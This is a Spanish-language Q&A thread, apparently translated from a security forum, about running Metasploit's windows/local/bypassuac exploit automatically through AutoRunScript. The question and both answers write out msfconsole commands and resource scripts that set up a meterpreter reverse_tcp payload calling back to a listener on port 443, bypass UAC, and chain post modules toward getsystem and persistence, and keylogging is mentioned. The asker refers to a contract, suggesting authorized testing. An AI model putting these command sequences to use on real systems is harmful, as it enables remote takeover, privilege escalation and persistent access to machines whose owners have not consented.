¿Cómo ejecutar exploit / windows / local / bypassuac usando AutoRunScript?

5

¿Hay alguna manera de ejecutar exploits que requieran parámetros, como el que está en el título, usando AutoRunScript?

Pude usar AutoRunScript para ejecutar algunos comandos de publicación perfectamente, como keylog_recorder o checkvm .

Pero cuando agregué mi script, esto:

use exploit/windows/local/bypassuac
set TARGET 0
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.0.1
set LPORT 443
set DisablePayloadHandler true
set SESSION 1
set TECHNIQUE EXE
set ExitOnSession false
exploit

Tengo esto:

[*]     Running command use exploit/windows/local/bypassuac
Loading extension exploit/windows/local/bypassuac...
[-] Failed to load extension: No module of the name ext_server_exploit/windows/local/bypassuac.x86.dll found
[*]     Running command set TARGET 0
[-] Unknown command: set.
[*]     Running command set PAYLOAD windows/meterpreter/reverse_tcp
[-] Unknown command: set.

Claramente me estoy perdiendo algo aquí. ¿Cómo puedo hacer esto? Mi objetivo es poder omitir UAC, usar getsystem y luego obtener un punto de apoyo mediante las opciones de persistencia.

Como nota al margen, entiendo que usar "set SESSION 1" solo funcionará para la primera computadora del contrato. Necesitaría usar de alguna manera una variable para referirme a la sesión que se está iniciando actualmente.

¿Alguien tiene alguna solución para esto?

    
pregunta user342872 03.11.2015 - 02:18
fuente

2 respuestas

2

Debe proporcionar las opciones directamente donde está configurando AutoRunScript.

msf exploit(handler) > set AutoRunScript exploit/windows/local/bypassuac LHOST=192.168.0.1 LPORT=443
    
respondido por el void_in 12.11.2015 - 07:16
fuente
1

No puede ejecutar esos comandos en un AutoRunScript porque son comandos para el msfconsole, mientras que AutoScriptRun solo funciona en el contexto de meterpreter. Entonces, necesitarías algo como esto:

#msfconsole.rc
   #Configure your listener and payload
   use multi/handler
   set PAYLOAD windows/meterpreter/reverse_tcp
   set LHOST 192.168.0.1
   set LPORT 443
   set AutoRunScript auto.rc
   exploit -j
   use exploit/windows/local/bypassuac
   set TARGET 0
   set PAYLOAD windows/meterpreter/reverse_tcp
   set LHOST 192.168.0.1
   set LPORT 443
   set DisablePayloadHandler true
   set SESSION 1
   set TECHNIQUE EXE
   set ExitOnSession false
   #here you can also set another AutoRunScript for your new payload
   exploit

Y en el auto.rc puedes poner cosas como:

  

# auto.rc

     

sysinfo
     checkvm

Y cualquier otro comando metermetro o post módulo.

    
respondido por el w0lf 04.11.2015 - 02:02
fuente

Lea otras preguntas en las etiquetas